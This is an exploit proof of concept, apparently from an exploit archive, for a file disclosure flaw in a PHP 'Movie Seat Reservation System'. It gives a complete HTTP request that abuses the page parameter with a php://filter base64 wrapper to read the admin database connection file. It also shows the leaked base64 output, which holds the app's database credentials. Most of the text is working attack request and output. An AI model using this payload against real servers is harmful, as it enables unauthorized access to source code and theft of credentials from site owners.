Movie Seat Reservation System File Disclosure
Exploit
http :// 192.168 .1.101 :8080 / Movie_Seat_Reservation_System / index .php ?page = home
Use Burp Suite capture request and payload => Send
Then decode Base64
PD9waHAgDQoNCiRjb25uPSBuZXcgbXlzcWxpKCdsb2NhbGhvc3QnLCdyb290JywnJywndGhlYXRlcl9kYicpb3IgZGllKCJDb3VsZCBub3QgY29ubmVjdCB0byBteXNxbCIubXlzcWxpX2Vycm9yKCRjb24pKTsNCg ==
Vulnerable Code
POC
GET / Movie_Seat_Reservation_System / index .php ?page = php :// filter / convert .base64 - encode / resource = admin / db_connect HTTP / 1.1
Host : 192.168 .1.101 :8080
Cache - Control : max - age = 0
Upgrade - Insecure - Requests : 1
User - Agent : Mozilla / 5.0 (Windows NT 10.0 ; Win64 ; x64 ) AppleWebKit / 537.36 (KHTML , like Gecko ) Chrome / 99.0 .4844.74 Safari / 537.36
Accept : text / html ,application / xhtml + xml ,application / xml ;q = 0.9 ,image / avif ,image / webp ,image / apng ,* / * ;q = 0.8 ,application / signed - exchange ;v = b3 ;q = 0.9
Referer : http :// 192.168 .1.101 :8080 / Movie_Seat_Reservation_System /
Accept - Encoding : gzip , deflate
Accept - Language : en - US ,en ;q = 0.9
Cookie : PHPSESSID = 0722 dtqnb1dgvuono8uubajcae
Connection : close